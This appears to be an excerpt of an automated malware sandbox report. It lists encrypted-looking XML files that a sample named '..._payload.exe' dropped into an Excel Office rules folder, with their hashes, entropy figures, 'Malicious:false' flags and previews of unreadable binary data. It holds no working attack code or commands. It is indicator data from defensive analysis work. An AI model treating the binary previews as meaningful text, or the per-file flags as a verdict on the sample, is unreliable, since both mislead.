                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490005v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1028
                                                                                                      Entropy (8bit):7.7892276658775765
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:H5EO7+aHm02hIG4OCPL9GIyMipZD1X+NOGQ/Zg/7haqTA0nurxiLv6bD:Hf+50oSOEAIydV1ONDNj3AVrxYwD
                                                                                                      MD5:C5DDCEEFE6D67C6B2DE1FD70636C5997
                                                                                                      SHA1:D6788EAA4E88138A12F9CCB8E97F46CF2209A5C0
                                                                                                      SHA-256:889D559F7CC2232BD5C81DC70241FCCB53210363534B573D772DC02C327EDBF1
                                                                                                      SHA-512:1132C2CB40FA7C18DE285CC2CC5C0B9484D2EEA7503D6488F8132E7E1E4C1BA72CA1E9DF43C29DE1EAD62100DD015EF19FB98E6424C46779BC11BABAE0581E20
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.;..3.a.9..".a..a..#5..n.<...$...B..-=..Ya.jbL=.1*.-.[+..3t8.1..w...>.T....d.E 0.K.4*$..6~.......U..3.....E8.(W.mp...u.........3.....-bU...t'.o..R....bb.D......+..T.~`..`.P.4]..A.&.*%Wb....?.<..:..p.O:..,n..td@...e........;...0.....<M.....p4..@g......A..PqI.d_..7..|.D[a.../.6rN......<.....M..z..5E.w...I..5.'K.......?.U..s......\(.sJ.b.aJ...hA.wb...F.u.4"....}.....].t.).m[.....>....Ha.J.....o....?.z.....t`8... ..|..o.G(|f.Y.... .....!CYF. .?`.5%.2.r..g......s@@_.5.O...n.....2b..+...N=)?a...vf./=9..<I.'./F....(..Vt..b...C/..#.G...'5.l..U._.oR"...........k4...j$...h..+3.n.8..m#...^*...O.v.2bg.x.....F._.p&...7...\.l.$......5..Z.o...3........b.".gJi.;..S!8..(..V...B........../...%..v..~.6.b...-c.5).....>E. ....`...:..|.!....L.ER.GR@..g.2.{..F....$../.|O..."8...I&)j+....5...2r7kVV?.Z..2F......'.....@..w....8.a....C>R.Jmr&..N...d...j..Og..$..V5g..~.\..!.B.ZX.|...&.l.YfT..L.>.B~..Y........O}$!y.PUhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490009v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1453
                                                                                                      Entropy (8bit):7.850405020400529
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:nMXouJk+nU/fVQAJXHkpMK+amXFYP+KeiGLey09qkRHvsHFtDSfkUlOMcMY0qvHv:nMXouJk+UlQAJXEaVXm2YqY6FtWMUllG
                                                                                                      MD5:8C54D0C519CBC31B139AC358023EC1B5
                                                                                                      SHA1:BE6A819DE10F2EEB4EBAFB52690ABEFEBE027934
                                                                                                      SHA-256:6B8E1125F0BC1B529DA0718E2DB4EC0A8BC13FB1FBF7F1255A74A5F89A444DAA
                                                                                                      SHA-512:FEAF9C0E0435D5E9DFF83D0F52D269D1E1A786433C6432DAA5EAB39F9C41A87C6B21467727D5B06B43F4F6F0AC4D3F580CB10596A052CA5CD118512AB49DE169
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...].L}.+.f.:.Q..5.}......lRh..g...).......+...^.B.s..==.O.T...........:Iv..j(......]....xO..D......M.1.v...*.........*.A1+xs+O.=.XU.(.X{~d../.2..de..F.'otI.+...mdJ..>.v...l ..4.Kr....e.|.].?D5.D..d...../.z.E..>..8+.._.k4.....P...._..=.I%..!.=!...3...c.Srk...2:..@.....e(R..$...y...r"9.R...e.d./.~m..Z.\<-........../..=..w.'sd..F;.=...A....3..".........@.....;, no.E.2.'#.kt(1.A..5..[.. !d..r.-.#....{^C..<.. r?.5%d..........-.$.d0..U...e...E..h.#...-....|'.....'G.x...x.<..3....~K....x......E.dD.p...+.Y0 .7........".Gq.`.=/_q.t. ...,.U....."..w6.o..}....Ol....3n..<.O......i..o+.5{]...y>..s...dC.........CK..z....r}W.S;.#Qdi.Y..+j......L...z.:...M....7...J....)..24....o.,...n..;....jYO}.....L..0.f..P.r.]..y.. ..^/.]O.J.x...'i.c$+n.1....7..C.P.....+...."=.^..ay~R..oe./(..4.&}V#....x..7.......a.V.}....+.1.xV#`/.G^A4.8..)[...l.Y.[b..))...*..U.....O...VZ*4D..E..O..H.\7...."s.z"6fR|Z7L.&X-F...o.iz.-..kCMh._..b..cDEq^.La<...A.T.*%..V.>.......%..W.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490010v7.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1388
                                                                                                      Entropy (8bit):7.857254581676264
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:R3Z1MR6u85Gt2e/m+t9vA9dHpJ6Q50SJij9LfTSOGypqg3s19bMaPgv6bD:xZE6N5mO+T4bDLJij97T7GAq4o9bVPgs
                                                                                                      MD5:35CA6C6DD8273F1F5049C0DB34734E62
                                                                                                      SHA1:B887584FD9E8AA2D25E6F22576A053B40B7368C4
                                                                                                      SHA-256:82B071D30A8458689B9A70EA0B8B1BFC12668DA2A827434BC4B31C92B3363BB3
                                                                                                      SHA-512:6E89A1D07859C425A494AC52C3BC34D4201E52AE86E66A40CBF1752DA21BB399466A386C0220BB208772AA42E8616A4EC4BFB6D4A76CF8DDFEEDA2DF456EF5CB
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....nY_]S....d.F...>1MWH.0..V>{...I&..@N"...v87...V.6.m..y.qQ.D.... A.. ...r...?ttd.#Q.q..O.)..|.'.;ZZ..q$.m.N..kn... ..{......nZ.....#.'..1.......A}....;A.......o..}9|.%`...]Y^..T<.T......|.... (heT...A,w......$...9.Q........Qmk|H.......e..r..a...ESa..Y&.C.s|.*.%l.B{gW2.(..-z2"w.{!...#fY|.[..Qc.V...rY..s.$...?..x.4..rv.A4`&...r)n.P2....`...v..0y..@....e.......FB..N.j\.~7..*.&6n...o8..@..~....6.......%... ...f..5...|.....J[JA.5..h..J.Jg.Z=.....+..+..C ...!.u...8.b@. s8..........~..7...p> ..jnb...c...........mp...EH......|(.....T.s.W..jNe...?3I..J y..(.n.{..i1..d...Xl$.S.=......E..Y*l.bq.%..K..M..X.F...!.(...4Di=C:.<....R.*h0.....{.Y..`..:......4...sP..Rz|R@.,H.P.IEp.G.....=Q...].5`$$.p...>It......!0:...82&T...(.l..n..knW..p.....k2e.......X.y.-<..Q*...d.`/s.nm.a.J.U.......?......^3.."W.......j.1..gHI...`.f...&...d.D....f....M......pz.F...OI.\w.=.>^.<...T........!.Pp0*.G....)..sE.Ar.nU.8Akt0.\.'.C.|..G..p:.0io'-.....7.ed.-.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490011v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):856
                                                                                                      Entropy (8bit):7.711908701349778
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:4x5ojfVCGYZ3sBve65cyjirGzHvrlN8ca+xMZv6bD:gN3q593HzlAsMZwD
                                                                                                      MD5:421385CA9C65042E831F00D6D5BED1C0
                                                                                                      SHA1:5F33F18B03338BD1CC467B58AE9FF39B5837DBBA
                                                                                                      SHA-256:1D67164589B62372592DB1D77B157D3F402451DD07DD4D7E7ADC5CC0F416AE6B
                                                                                                      SHA-512:29E104FEB645497659C01812D4C65E68CF4FEDBA5FBF57E82788FEFF72F5206514C8C1CBB1BB34674D1077B1C0D25439410834841885B8A112B2A3F45B1B3B27
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.i..W..@C.O......g..(...l.....k..,-IW...".OU^....[.ci.....~.-.7.e.^....7.h.p..%.....nh.pG..1|..n.E......u....e?s...2.y/`...J.......e./.{.u/....H...r..E..8,...u.9......o..K.K....),.KI.aJZ...W...N|..@"9.y.....G..(P. ..H....4../..J..D0[.G....{.6....l6+...f..A=D.....g..`.x..X.....%.-9/....e..D_A...d..P@.}3.. ...#._^.|..c...Mw.3.&.s.0E..n....5.)...W.E6.j........$..x....+HT|N.......B...`(...e|.b.....%..>Yn.j;R.K...'.....DX q.V.!...\..B...t.\.#;L..a.x...v..`.=[j_' 1.7../.I.9_t.O.$..|.....Q.n.|-..l.ZzL.4.D42f.V..q.R......j'"..q.8....7=.|...G..|.x...G...ubZ..W....y6?.X]..S.j......8..b..0z...,..6...v.........5T....../.s.MA...."....5......N..!I.9|.Z.4.C.j..p.q.U..B.G...)7.)._."..G.g=..4....U..%.@.{T...3.......t.....3....~....e.(.."hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490014v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1084
                                                                                                      Entropy (8bit):7.795984252370625
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:tnglbhq4E3ygbXK3c7ZSvKmT8qfTa4D9iiFzjD/ZEzv6bD:tgM93yY687m/fDfewD
                                                                                                      MD5:47E222D8C0885E7D4C78A4EE6F0A9337
                                                                                                      SHA1:628369DBB37213DBD2F6BE45A9484D33C18F3491
                                                                                                      SHA-256:B61CDB159D94D2B912ABF7A1200C8DD7DDC092BBD71811042BE29D1385B82516
                                                                                                      SHA-512:52F754E53A1669724A01DBD26CFE328400D864759C7505AA987BA32CF45CADF21B01746C3205F4A2A411B78FEDA6B97DB801101532F24D8DBC775DFE91DCB774
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.. ..y[.+......O4/.]6J.$yy%Yq...X.t.!.J.&.-.h.......T.}... ~.v.J{......[.c.....?..M...A....BrQ..._=)...*-+.Z?h..XL.H....{.........o.]..*Dx..6...&....7..X..P....^.....a.7.DG ..p..`...A..M.{.s..{..3...d.t=i.r\Z.....tr0........a..-..d.w..".XI.$....,vXwg.......3.....$...$L.db...)...~N2..Y.7...r...W.....9.d..ka.q..+.. .Q...I3.?.V..i....B6.......E........]...]-..B^..E..|$.|..N.\'...g;........+...r.,..Am...z.j...i..../H/a..oU...bz........e}...L.X(.JV.........1.......F..:..R.........|W..vG.j.i..`....a.nC..6Q]..J...e..7ea..Z........I...t.=n...Z..3.:..I...jD...P2...t{Z.-..f+A&...N.9'F..s.QA|...h5.*.~..Wa......9...[.8....3...v'V.&..qd..O.h./.4.j%3.,4.$.Q.4.E.G.2_.w..v......*...A.....e.q..p..e.Q...._5*)....x.l)v>t......%..C...2H..S.2(.M....H..G.......[.M..b.].J..5..N...&CY...c........~.).H._..}..]p.....3.=}..ga&....g..x}.....b.3.b...i...D.......9 >.....%..N...BZ..^.AL...c..{7pUH.8m..+....c....t=}..NFz.u...P.....*e......+.%.1...8..g.u^

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v2.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):924
                                                                                                      Entropy (8bit):7.782949634769896
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:/5iBgOL7VyTTSlGZV1d6ZtmapHY9p7v6bD:hG0TYGJd6ZTY9lwD
                                                                                                      MD5:35B27465DE10E40FD2DCF66B9651F869
                                                                                                      SHA1:0BCD10CE03742735E84B9D91647A8FCB1C4E3BC3
                                                                                                      SHA-256:1BF48BC295AE0B06C0F9BB85733C48A229D0E68F5A8968124FA0F7AA3EC58AB4
                                                                                                      SHA-512:154368E1366A36559BC2D4DBF9B0309F2C3E850D82FD8FC753EEC5B4CF9D36498D3EC1205172B64B619CB87D07740DB86A80790BDBF0E16316456D98CAFCA430
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmla[...?V....;......{.A.\..9.....r.B/a..I.........~...!.D.ql........n..7... ..^Lja.*X.....C6.......V.....D_.........k.e3_..O...y..W.d..B......z.0....w..d.K.i.}O)..E.0IP..."..O6.E.........X...&y..+..^.S..nU....=.l..,)q.....3.U.Y.>.@../Nm/....p.Wq...?....s.#y.3.....zn............k.K%.#......%.Ix..y_Rt"$_E...ihH.2`.!.5R.O./..........+`.W\.......,J*.w...^.(z...s.V.....d.m.q.. m..CJ.P.......ZO?(.c..2.+..'....2vA.u4%....Qoe.9b....#..>.q...y..l.*6....!$~..VDW.&h\$.),.........d..)..h..+q...!..@'..CM..i...k.jZR....?..).^..EVj.J.......9........).,QQ.w....y. ..vd...N.BB..........hJ]..;.:jB..^'....UL..W3.Z-2.w ...}..^..T.D.N!..D}u.].e..M9......}2Xl.V?^.....pw.....X.or...U.5".#...5....N..d)kI8s...y...^8A<....V9.M+.|F...%M....C.H.EG........&....S..|.i.v0....r\UM.c.)g...]...........d.tS.'..(......1..X.)..,...hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1090
                                                                                                      Entropy (8bit):7.783200552867676
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:fOKjZ4z3E5+DnkqkDZMMOfetTyDIUAmcofabsmXv6bD:mKd4z3E5+RkS7uTIIuXSbRwD
                                                                                                      MD5:EBDA51D093F0F6A2F5E8F2381F27A653
                                                                                                      SHA1:189EEFE60766D5CC6AE16F6956901E7982561D5A
                                                                                                      SHA-256:59366AA35AF2B565B61914D4580DB4A4E89E6369CBAFD620B3FA7A8039AC038B
                                                                                                      SHA-512:242BC33AFA0B94686376DC3DC3EEC1B4028729BD70601F5DD302FD19916276AD66D0B6D105CE6DCBDB585298D664D66F147EF7FF5EF713E3123A6AA6596A2440
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml........{..!...NA.s.yw......0.}.MD'..(..................@L....?.&`.T.a..3N../.H...q..z~5..fg....F..bG$g/m.Y...}...<'7........&...D.].&..|.M.$=...^.4^.....$..V...`8...@`l.8HWX..O.$..J.&'.{...../9...m 23.QJ.M.u.....[.T`.g..rpr.6W/....x8....R...`.O(i\.RDB....Q..sF.W..Z....s...M....F..g`..F.....>?S.g...{.|x..\f~...y..&kL.."f]y84'.TUI.j5......MRY$.-.9!.......~8....)rA.\.]....%...13....PJ...v.!... !:.8.^.P..}...#.YY.L....m."7a[..V....d.>..dn44D1.6Ob.....lh...n.@..ko.U..*.........0......Np.l.....~W[q....f'R.......*J|.h.gf....2.o...<.{{B(..Th...\...{...".\..q..j\CD.R..(E..v.......g.<=......r+f.$.y2.....@6]../%tT.7...../...G%...O.;(.Qu.Lq..P|>A..xq.?./.,..h...H.{......{-.J,......$s..EC...d.)..DX......`N."......2T....m7.AcF.>....P..{hRog.j..,G.Rf.{....T...C+^l.......?..k".SWX?..%.;a..].5.f......|...^....(.!l0.]*i{......u.^..g....r.=....>......!}..<._.&. &..H@...|...L...O..@.].h...h..F=..!.]..i..g. .3.pQ..E..../..3.../,..=]*:...5.v.."U.w

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v4.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1090
                                                                                                      Entropy (8bit):7.821486438640415
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OObKgpQVWmXaym09sztz1RwgAhGoIOv6bD:OOWgKqyRszl1RElIOwD
                                                                                                      MD5:967E8272ABDA85F22437D13CBD7D95CD
                                                                                                      SHA1:CDEFCD09CC43868465BEBD06B1070AA6A869F5E0
                                                                                                      SHA-256:5206F104D2F43926197D9B82CB4223FA985BD679A2156A8BF4DA2A10A43E8927
                                                                                                      SHA-512:4CC93E2C152A60C1747F06421666ED3BDEAEC71ACEAB85E789E13833A360BA83F5B0101429D7E25660322D04B6DCEFB4A552E61A1F981B1E82420B4B44EB6DE7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.W...XF0...&...\.......'U>0.]....S....n...ZB.....r....:...k.q.?..........L..Pa.W'O=...J....2...RL....t..|..r.n.U....._H.#..#..=#.zL(=.A|.3|u.:pk.V..@%.W*./C|....'...@...t.....Tj..Y.J.p....l...y...........,...z..=b.....X..Vqs.v.L..I.L~.W`j.i...y...*......`...dn....v...`;.Z..&. ....c..D...~G}.0..iq.z1[%.{.O..ko#A.................{\.~.q..#..Y7s.(!......z..y-.B..T..C5 ..D..q..H6......._A.$#..:.h.BG..;^.\cs..."...e..H...*...X..bF...)s..6.......9..^G.....'....... .....7...&....m.M.Nr..=.X....X.......1.O..=..sIK..s(N?.E..>._M....S.K.>&.g|......Hq:Y.{W.D5S....x..j...1|..M...k...P..C.....=..BV..........Y...9..v.Y..Bx4.....zT.........].,.\...................[.Q..a.....nh.16.W....H]..W{..6!..rFOe..+..?...pp.OX..Z...z.3t...q...V..:...g.....0.L8i.vVF|.mp....NF.^J.t..g.w.#=sP..T&...q.i.R..,..(J.#....h.O.b%..8_..9UMq=x.i..Q]<.....;$.M..K..s... J....U..4..z..jn}!.-<....@a..x...)+.K..v...U..9].t..f.....-D....^..0l.=^..FS..!..v.....8<.f..7..[s.}...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490015v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1108
                                                                                                      Entropy (8bit):7.807022092951006
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:QvoUgFrx4ARgzKOAncRizp0JIbnGeE7s/RShJPYl7v6bD:QIFKgU1AcRizpwIDE7s/ohhYpwD
                                                                                                      MD5:54C5EB047D71409A544C8566E079E222
                                                                                                      SHA1:9E514BACE5A5C84A557430C0C8C901074C0D214D
                                                                                                      SHA-256:C46EF4CE947611CEFA3FB68F87AEB806BAA74BA3BAAF85CC8FE1A0536DD88CC2
                                                                                                      SHA-512:B77836E0E1A691837009C359B463764185306A561CD7C58CC788CDD48152BC6FA2D145C1B2D6F44B37DB5DC5D093A9F67F02CC5CD5DDB198553186C4F5E0D70B
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml-3IT0.l..-.+0...KW#.a.7..&..T.|..zY..[...?.....dhtl;I\....v.^.\.$Xs... q 8....&...oE.C.Qg....s.go.NR.....cd_.jT.{;8..H.......tl...(...+.JQ@..u'.kv.....F..|.D(.G7....{....$.....$...Q.CA....>..=I&.h....G.G.....$.^.Q....Cb*.......f .[.\......^a......y.....VY....e.`Yf......(..FA/.K@../...<.O|.u...],...z.......R..]....d.4....~..R....L.;.k..g..w.....z.....sE.h..2a.O..og.X....>pa.wNW.T_..%..6...IF.......9?.....po#[q..s.4O.1..+c-\A.?.....<...=6F".&..9........b..m.....yQS.[."N....j6......Z/.."y...IO1.5...a.}D.t...T..Y...h.....B...>.o..=.L.y...q..-....l...o..L.C...j.e....j..LN..+'....Q.F.sx.D..G)...zY>...\.Z......0....V..vw.dV..!.V.Y..F..oS.(...-....Nt.c.5..P..d^.5.&...S..... .+8..M.a...!..........UXk....U0.y.v.../{.,....b.d.....W..1....x..$V....Q..."kB.u.{u..P'....R..e..cC...../...|.!....a..>={..#.<(q3.....5s.....)..:..E|!1>H.y.`.Y{....(.x....p'.FF.i*n.`..w.....F u...,.h..........G..g.Qq....V.`..E.x......K..H.F(..2....B........S..hq.M.Ft.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490018v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):934
                                                                                                      Entropy (8bit):7.788417282683322
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:sA0ISlnkKIhYDpS53oAdIxl7pPmY7JE3D13J4XUwlU9vScS8v6bD:mIynkYS54gIn7dmYe9+fsvF1wD
                                                                                                      MD5:AB951E93B0C4EE4F58EE5B4C8FE1AEAA
                                                                                                      SHA1:731105CB39E9383FA39C8B9B2C28FA6111C31425
                                                                                                      SHA-256:7E9D6763195DEB267706658E0E169931ED05ABFC262641854EBC904D513688EF
                                                                                                      SHA-512:291BB1766B6F6DB6032E52E125EDC77CB6BDA5E7C5A86A4556A25B89B1685DEC8E1FACAC020C1E2BD2E6F7496E33E747CD2F1992A6CA05711D08D936E61966B4
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.(.....b..A...9...y....NZ...E.-s.....q...|......Q...,.2.T[.8.s.t..\~.3.J.K...PkC.P..X..i.*m~.1...n..v....1...........-MH9.....n. P.y...<)d..b....m.......^\e..H..6...B.Mk........W......_-m.\.....H.....T..k.....p.Q..V.,,(...l..A..EV..~...R..]k...6..d..m"3o..).x..*.`e...0...&9..r\$L...g.-.W|.M....n{...N...>.NMi.l..].......s..rC...5. ...3..r2...L....k..O?}..BF.....dw}k...^.]..WB#|.m}f..4^H.p...U=.....m.#.]...............Q.C.G.^~......"al..elP.%.=.b...w.......z...VXxS8\aen.;Dt..N...Pl.b...V....+....S.....> .*.(A4.2...9p.~..4.n.gT...+._..v_.|A...Z..^.\rP.M!.v2..@..]y[G.......l....{.....[...F.u.ch.....b9Q.H...c.....4}..i..PB+~){....@..i.U....Ow.<CY..bz. .?..........|..?K.W.'!.^.\].'r..Z;U...gxL{.woM4zCF...<..o....f..g......G.............x...B.."*...d.2..F.=E.._:..Ya/..2..h............"A.PA.....)..S.A&....hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490020v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1126
                                                                                                      Entropy (8bit):7.8526383218725
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ixDfyB3VkQtwdbBrNq8FZiLp4jOW/lGkxh48dxa1v6bD:ixDfyB3XkbBNNQvQGD8qwD
                                                                                                      MD5:19F08091338C419BA53F7D514770FB1F
                                                                                                      SHA1:8C0C6B71A960162FFAF63981AADE8413BCCA9C65
                                                                                                      SHA-256:65F6E7C7FF3017300EBDAE39673B0DED56C9E5971EB67DC8BB64A4465412EF4F
                                                                                                      SHA-512:6D322A06B0A4544FDC3237A7C317E1F74900B98CD5422AB775198BC13DB663C0E5AA969A6F80BD61BFE8CFB433C51F9990552EB16D6E021B57DE14A4E7405B07
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml@_:.C.*%A=?.U.iv4,$....BTW.y.QA.....\.......uK.p.(.d{.......5P......{..7.......vi..[.....M....CL.:v..*!.V.2..#..z...$.6...k..V...U.....?.=jb.W..gN6,U.^h.....T........gI.u.~]...C..;[3...y(.s.S..M....g......w.......-.V...;..:E.s.....I..i.q.Rxu..*.....3...w.&<l....L.4......fZ........./\.u,..(....B..6..rD...=...:........o.........*....i....2.5...+...i...^5..`..yh....C.Z..QW..c.I..^.$_..v.Y.v.=...0..-..5...w.n..d.......0j..`..x...Eb."{.r'Ws..(.r ..t,.....c^Db...F.....~..o.....HYb...W;...T..`.LW.8..&..b'.Q..S....R9..#...o...+...R....Sw.)M^._].[.....1..*.....Y....E~+..)n"L:..`8.`ry.\.XZ.0....a...w.<......y1..Y..$.,..S'mg5.y.I..;..,(wf.6..*.#3e.I.....!%+..H..X.*..j.P8.....,|K........hN.<.lP].\.V,..ZSf..N.O....._.."3&s.?c.....A.y....r.]k......!..t....:}..i.....y....Nj.x(6,m...{..@.I.!.aa.....JsE.K{.&..(r....|.!{\.... .f....2).iy=..w........T!O..43.....0..'..M.*1?.'+e.l..s.....7Z.$KS.4.EYb@....hO.......(.......E2.].....\....!.T.m.*...(.=8..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490023v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1243
                                                                                                      Entropy (8bit):7.823925010908005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wrAQrHng3QCIqubU9rs6Ikw5snEHU4DWUVNyUqm7gPxDgSMaxv6bD:kA2g3QQ9o6IfEELVNKlPxowwD
                                                                                                      MD5:631235C540C22A7E3CF1F624C89543FE
                                                                                                      SHA1:45C318BA60C035461999F968C7CBBF2CA6265FEB
                                                                                                      SHA-256:2704969EBD01F36E2140655AE63958C054260D7E6A82C800A87898A9F0C6EF4A
                                                                                                      SHA-512:DEBC637A7B35BD1A69C06175EBFE4E7DE277B87B2A9504D06121D6C434647D4C65994F6DADCA64F479118DABD914F329734157AAEBD7141A3C748B46D36E8CBE
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.E.5... ........l..A;H?....C...M.T..|u.{....`...%....L..fDwT..fu.|..j.k...bw..;....g.7I.b.9.`..e<..T.TnY...{.:........<.f.|U.."r. =.o.7!...Xt.b.G...z7..BU3.G."..)cq........Ek.}.)./..x..0.........z.I.T..B.\....*.u.2...:......`...B....n:.!w..}W.^.N.=."$....3..p..L.. .:)Y.,....T..G&,Z......n.aD..F..v'.1...r.o.....kY9A..z.@.CC......C.......Gweq.[.....R.a.BvC...$HT.6.rl..q.3O.q...A..].`.M.H.`.K..........;I.8x.sQ....)w..(.f.....q.L..d....._;V._...]T.t.?...K\ .h=..>I.7..r.D.7...pbu.U..gv....Hl.W...{_P.pM.e~....P.3.%......2=h..Zy.u...v.~AkMCNHL.L.B....<..z6vx......|!OV..N..0......M.8F....."H.L._....%.........3VF".H./...U.2..m0...)...u......./..8`P.1.{}.....2..)8.h....Q......$.`MGei..4..C..f.f.z%""...Z.....!h.....@.&.4c.JZxj..Ju4...9.'O.He.........&..VhD..-.#Z...Lns....sq..)$.?...[...A.8..6....w./.........bU.x....4v....HIX.y...Z...i..`2.o.A.].2...#W.k.u....!]...%.....U.p.G......u......'.GB..L..Mn7.r..w.......I.S.8..No.r.k0..Z......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule490024v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):871
                                                                                                      Entropy (8bit):7.778831878003159
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:Q5h7uIb0xalP36iYv1GBEYqxt+DEKp1cHixwsHraNbVCCd7m5DEjv6cii9a:uh7uHMlPec+Rt+DbxwkapVLdaDEv6bD
                                                                                                      MD5:FBB138C44BE977ED4B98F21776EA4C09
                                                                                                      SHA1:6511A818DD1FD62AD59FAB74F33D79E3CBB8D03C
                                                                                                      SHA-256:649FE2A0CE6D076C2CC6C61815269A8267C6AD8C87A6F956717071E06AD818E9
                                                                                                      SHA-512:BDDADF316878B0650FD39F00C208E5B8D1182EEAA0560CD5BF1FE0FCBD51E270DBBDCED7E4ED311A663DEA37C94C2B059800A62C22249520284DDCF6D76816E1
                                                                                                      Malicious:false
